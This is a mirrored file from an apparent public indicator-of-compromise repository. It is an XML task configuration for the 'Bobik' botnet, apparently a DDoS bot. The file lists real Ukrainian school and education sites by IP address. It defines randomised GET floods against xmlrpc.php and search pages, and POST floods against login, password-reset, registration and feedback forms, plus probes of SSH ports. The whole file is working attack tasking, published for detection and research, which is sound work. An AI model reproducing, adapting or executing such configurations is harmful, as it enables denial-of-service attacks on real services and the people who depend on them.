6
0
mirror of https://github.com/avast/ioc synced 2024-06-28 17:51:17 +00:00
ioc-collection/Bobik/XML_configs/22-09-01-09.13.xml
2022-09-05 23:38:20 +02:00

48 lines
10 KiB
XML

<?xml version="1.0" ?>
<config>
<tasks delay="0" thread_count="-5">
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/map?koatuu={d,8,8}" response="1" allow_gzip="1" timeout="1000" https="1" id="399673135"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/map?koatuu={d,8,8}" response="1" allow_gzip="1" timeout="1000" https="1" id="399673135"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/map?koatuu={d,8,8}" response="1" allow_gzip="1" timeout="1000" https="1" id="399673135"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/map?koatuu={d,8,8}" response="1" allow_gzip="1" timeout="1000" https="1" id="399673135"/>
<task type="http_10" period="0" method="GET" ip="88.218.28.16" port="443" host="jammschool.com.ua" path="/xmlrpc.php" response="1" allow_gzip="1" timeout="1000" https="1" id="399673207"/>
<task type="http_10" period="0" method="GET" ip="88.218.28.16" port="443" host="jammschool.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399673217"/>
<task type="http_10" period="0" method="GET" ip="88.218.28.16" port="22" host="jammschool.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399673227"/>
<task type="http_10" period="0" method="POST" ip="62.149.28.49" port="443" host="cdo.org.ua" path="/send.php" response="1" allow_gzip="1" timeout="1000" https="1" body="ff=consult&amp;firstname={.,6,12}&amp;phone={d,12,12}" id="399673357"/>
<task type="http_10" period="0" method="POST" ip="62.149.28.49" port="443" host="cdo.org.ua" path="/reg/?login" response="1" allow_gzip="1" timeout="1000" https="1" body="------WebKitFormBoundaryPXV1AWPOQyQN3NyH Content-Disposition: form-data; name=&quot;phone_user_login&quot; {.,6,12}@{.,6,12}.com ------WebKitFormBoundaryPXV1AWPOQyQN3NyH Content-Disposition: form-data; name=&quot;phone_parent_login&quot; {.,6,12} ------WebKitFormBoundaryPXV1AWPOQyQN3NyH Content-Disposition: form-data; name=&quot;login&quot; Увійти ------WebKitFormBoundaryPXV1AWPOQyQN3NyH-- " id="399673391"/>
<task type="http_10" period="0" method="GET" ip="62.149.28.49" port="22" host="cdo.org.ua" path="/reg/?login" response="1" allow_gzip="1" timeout="1000" https="0" id="399673441"/>
<task type="http_10" period="0" method="GET" ip="91.239.232.105" port="443" host="school.meridian.com.ua" path="/?s={.,6,12}" response="1" allow_gzip="1" timeout="1000" https="1" id="399673562"/>
<task type="http_10" period="0" method="GET" ip="91.239.232.105" port="443" host="school.meridian.com.ua" path="/xmlrpc.php" response="1" allow_gzip="1" timeout="1000" https="1" id="399673583"/>
<task type="http_10" period="0" method="GET" ip="91.239.232.105" port="22" host="school.meridian.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399673704"/>
<task type="http_10" period="0" method="POST" ip="185.156.41.160" port="443" host="online-shkola.com.ua" path="/cabinet/auth.php" response="1" allow_gzip="1" timeout="1000" https="1" body="name=q23123&amp;ocenka={.,6,12}" id="399673824"/>
<task type="http_10" period="0" method="GET" ip="185.156.41.160" port="22" host="online-shkola.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399673932"/>
<task type="http_10" period="0" method="GET" ip="31.28.168.119" port="443" host="www.athens.kiev.ua" path="/?s={.,6,12}&amp;submit=Шукати" response="1" allow_gzip="1" timeout="1000" https="1" id="399674082"/>
<task type="http_10" period="0" method="POST" ip="31.28.168.119" port="443" host="www.athens.kiev.ua" path="/php/index.php" response="1" allow_gzip="1" timeout="1000" https="1" body="log_form={.,6,12}&amp;pwd_form={.,6,12}&amp;login_submit=1&amp;login_submit.x=32&amp;login_submit.y=10" id="399674120"/>
<task type="http_10" period="0" method="POST" ip="31.28.168.119" port="443" host="www.athens.kiev.ua" path="/php/feedback.php" response="1" allow_gzip="1" timeout="1000" https="1" body="------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;sername&quot; {.,6,12} ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;mail&quot; {.,6,12}@{.,6,12}.com ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;email&quot; nomail ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;task&quot; notask ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;text1&quot; {.,6,12} ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;send&quot; ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;mail_file&quot;; filename=&quot;&quot; Content-Type: application/octet-stream ------WebKitFormBoundaryycgPECNY8rMSTj2b Content-Disposition: form-data; name=&quot;sendcopy&quot; 1 ------WebKitFormBoundaryycgPECNY8rMSTj2b--" id="399674190"/>
<task type="http_10" period="0" method="POST" ip="31.28.168.119" port="1122" host="www.athens.kiev.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674211"/>
<task type="http_10" period="0" method="GET" ip="212.26.146.67" port="443" host="e-journal.iea.gov.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399674345"/>
<task type="http_10" period="0" method="GET" ip="77.88.252.70" port="80" host="shodennik.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674421"/>
<task type="http_10" period="0" method="GET" ip="77.88.252.70" port="3331" host="shodennik.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674437"/>
<task type="http_10" period="0" method="GET" ip="77.88.252.70" port="3331" host="company.shodennik.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674501"/>
<task type="http_10" period="0" method="POST" ip="77.88.252.70" port="80" host="company.shodennik.ua" path="/join/form/default.aspx" response="1" allow_gzip="1" timeout="1000" https="0" body="dnlast=&amp;dnfirst=&amp;dnmiddle=&amp;dsex=NotSet&amp;sposition=-1&amp;snlast=&amp;snfirst=&amp;snmiddle=&amp;ssex=NotSet&amp;sbirthday=&amp;semail=&amp;swphone=&amp;comment=&amp;CitySelectBox_country=UA&amp;CitySelectBox_region=7119&amp;CitySelectBox_childregion=c48194&amp;CitySelectBox_cityRegion=33&amp;stype=4&amp;otypeou=12&amp;oviewou=62&amp;sname=rwewetwet&amp;snamefull=werwerwerwer&amp;sphone={d,12,12}&amp;save1=%D0%94%D0%B0%D0%BB%D1%96+%3E" id="399674546"/>
<task type="http_10" period="0" method="POST" ip="168.119.201.117" port="443" host="education.umj.com.ua" path="/login" response="1" allow_gzip="1" timeout="1000" https="1" body="log={.,6,12}%40{.,6,12}.com&amp;pwd={.,6,12}&amp;submit=%D0%A3%D0%B2%D1%96%D0%B9%D1%82%D0%B8&amp;redirect_to=https%3A%2F%2Feducation.umj.com.ua%2F&amp;testcookie=1" id="399674627"/>
<task type="http_10" period="0" method="POST" ip="168.119.201.117" port="443" host="education.umj.com.ua" path="/lostpassword" response="1" allow_gzip="1" timeout="1000" https="1" body="user_login={.,6,12}%40{.,6,12}.com&amp;submit=%D0%9E%D1%82%D1%80%D0%B8%D0%BC%D0%B0%D1%82%D0%B8+%D0%BD%D0%BE%D0%B2%D0%B8%D0%B9+%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D1%8C&amp;redirect_to=" id="399674695"/>
<task type="http_10" period="0" method="GET" ip="176.114.4.180" port="443" host="voshozdenieschool.com.ua" path="/xmlrpc.php" response="1" allow_gzip="1" timeout="1000" https="1" id="399674745"/>
<task type="http_10" period="0" method="GET" ip="176.114.4.180" port="443" host="voshozdenieschool.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399674759"/>
<task type="http_10" period="0" method="GET" ip="176.114.4.180" port="22" host="voshozdenieschool.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674791"/>
<task type="http_10" period="0" method="POST" ip="176.114.4.180" port="80" host="ukr.voshozdenieschool.com.ua" path="/imlogin.php" response="1" allow_gzip="1" timeout="1000" https="0" body="imUname={.,6,12}%40{.,6,12}.com&amp;imPwd={.,6,12}&amp;imJsCheck=765C9BDE1C1BEC66D20FBBDB0E578FB1" id="399674875"/>
<task type="http_10" period="0" method="GET" ip="89.184.79.245" port="443" host="www.futureschool.online" path="/xmlrpc.php" response="1" allow_gzip="1" timeout="1000" https="1" id="399674943"/>
<task type="http_10" period="0" method="POST" ip="89.184.79.245" port="443" host="www.futureschool.online" path="/wp-admin/admin-ajax.php" response="1" allow_gzip="1" timeout="1000" https="1" body="us_form_1_text_1={.,6,12}&amp;us_form_1_text_2=23423423423423424234234&amp;us_form_1_email_1={.,6,12}%40{.,6,12}.com&amp;action=us_ajax_cform&amp;post_id=23827&amp;form_index=1" id="399674973"/>
<task type="http_10" period="0" method="GET" ip="89.184.79.245" port="22" host="www.futureschool.online" path="/" response="1" allow_gzip="1" timeout="1000" https="0" id="399674992"/>
<task type="http_10" period="0" method="GET" ip="45.83.192.129" port="443" host="977.com.ua" path="/xmlrpc.php" response="1" allow_gzip="1" timeout="1000" https="1" id="399675076"/>
<task type="http_10" period="0" method="GET" ip="45.83.192.129" port="443" host="977.com.ua" path="/ru/?s={.,6,12}" response="1" allow_gzip="1" timeout="1000" https="1" id="399675089"/>
<task type="http_10" period="0" method="GET" ip="45.83.192.129" port="443" host="977.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399675099"/>
<task type="http_10" period="0" method="GET" ip="185.124.11.178" port="443" host="planetaclub.com.ua" path="/search/node/{.,6,12}" response="1" allow_gzip="1" timeout="1000" https="1" id="399675139"/>
<task type="http_10" period="0" method="GET" ip="185.124.11.178" port="443" host="planetaclub.com.ua" path="/" response="1" allow_gzip="1" timeout="1000" https="1" id="399675153"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/wall?id={d,4,4}" response="1" allow_gzip="1" timeout="1000" https="1" id="399703964"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/wall?id={d,4,4}" response="1" allow_gzip="1" timeout="1000" https="1" id="399703964"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/wall?id={d,4,4}" response="1" allow_gzip="1" timeout="1000" https="1" id="399703964"/>
<task type="http_10" period="0" method="GET" ip="188.114.97.2" port="443" host="nz.ua" path="/wall?id={d,4,4}" response="1" allow_gzip="1" timeout="1000" https="1" id="399703964"/>
</tasks>
</config>